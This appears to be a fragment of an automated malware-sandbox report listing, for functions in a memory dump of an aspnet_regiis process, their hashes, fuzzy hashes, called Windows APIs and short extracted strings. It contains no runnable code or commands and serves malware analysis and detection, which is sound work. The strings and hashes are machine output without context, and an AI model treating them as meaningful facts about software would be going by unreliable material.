                                                                                              • Opcode ID: ad3a52c5436243bd349d55187353d72da76a7b93e6d30550c3eac20307c52734
                                                                                              • Instruction ID: a8bd3689fdb3b1c9e44a64464555e284a3f0872fb68a42878a39cad0341e26c9
                                                                                              • Opcode Fuzzy Hash: ad3a52c5436243bd349d55187353d72da76a7b93e6d30550c3eac20307c52734
                                                                                              • Instruction Fuzzy Hash: 9C31BAB1249350DAD320CF65D89171FBBE0EFC5308F554D2DF2A96B281C7B28506CB4A
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocString
                                                                                              • String ID: 0$PMJ$PMJ$PMJ
                                                                                              • API String ID: 2525500382-1521763145
                                                                                              • Opcode ID: a4e6d31f35580bf465a0f0b24856e67b7c0c7537846da152d5c04b80b1995780
                                                                                              • Instruction ID: c9742e550c91fb388f12ae7efe3219ac8d0fe2ac9c61f2c0e2791e174fb40bb6
                                                                                              • Opcode Fuzzy Hash: a4e6d31f35580bf465a0f0b24856e67b7c0c7537846da152d5c04b80b1995780
                                                                                              • Instruction Fuzzy Hash: E2A14A61208BC28ED326CA3C8848345BF915B67228F6887DCD1F98F3E7C3669517C766
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: du$ol
                                                                                              • API String ID: 0-715466222
                                                                                              • Opcode ID: 1d83772e80c84921986ede9d056d02d37cbb6c8a6443794b7b8196895df550df
                                                                                              • Instruction ID: acc2988b42d4b4612cd9eb2a84d47e8ecbbc51f17195f1a617ef28889f886ee2
                                                                                              • Opcode Fuzzy Hash: 1d83772e80c84921986ede9d056d02d37cbb6c8a6443794b7b8196895df550df
                                                                                              • Instruction Fuzzy Hash: 72B146726083409FD320CF69CC9179BBBE5EBD5314F148A2DFA99C7291D7798505CB82
                                                                                              APIs
                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 72C59980
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentExpandStrings
                                                                                              • String ID: EwiE
                                                                                              • API String ID: 237503144-1857645623
                                                                                              • Opcode ID: 210a572c717c5678f014c8314578b81bc8ba4a7e386e0e667ab66dddfa88c43e
                                                                                              • Instruction ID: ca1ab8a8c26e3e23a5f9d23937e3d44a24a5a5cf9197578bb038f216cbdbb573
                                                                                              • Opcode Fuzzy Hash: 210a572c717c5678f014c8314578b81bc8ba4a7e386e0e667ab66dddfa88c43e
                                                                                              • Instruction Fuzzy Hash: 22C1D0755083518BD310CF19C49165BB7F2FFD8314F188A6DE8CA9B254E778DA06CB86
                                                                                              APIs
                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 72C65742
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentExpandStrings
                                                                                              • String ID: =CkQ$HCkQ$MJ$PNrL
                                                                                              • API String ID: 237503144-2499749531
                                                                                              • Opcode ID: ebc4ea8f6b475417d8c4ec977bb59780499a090d6ca89dbc0b8061107bb1aac2
                                                                                              • Instruction ID: 613b3302653c9ed21be4ee5b46cd1cb75c98239b59c5c3130d6ff9173ac9fa64
                                                                                              • Opcode Fuzzy Hash: ebc4ea8f6b475417d8c4ec977bb59780499a090d6ca89dbc0b8061107bb1aac2
                                                                                              • Instruction Fuzzy Hash: BC311272A1D3108BD318CE29C85175FBBE3EFC6304F29C92CE0A55B284CA759906CB82
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: MetricsSystem
                                                                                              • String ID:
                                                                                              • API String ID: 4116985748-3916222277
                                                                                              • Opcode ID: 6b65dfe44738a6230494c72b08fdda6825040a6e629fea5bebd807e217bcc019
                                                                                              • Instruction ID: 85f678721203e7c22f1e18ddd1d9e82b0774e3fb01539dd3ce12e5a9fb19ad19
                                                                                              • Opcode Fuzzy Hash: 6b65dfe44738a6230494c72b08fdda6825040a6e629fea5bebd807e217bcc019
                                                                                              • Instruction Fuzzy Hash: 2031A7B4914354DFDB00EF69C98560EBBF4BB98304F11896EE498DB350E770A988CF92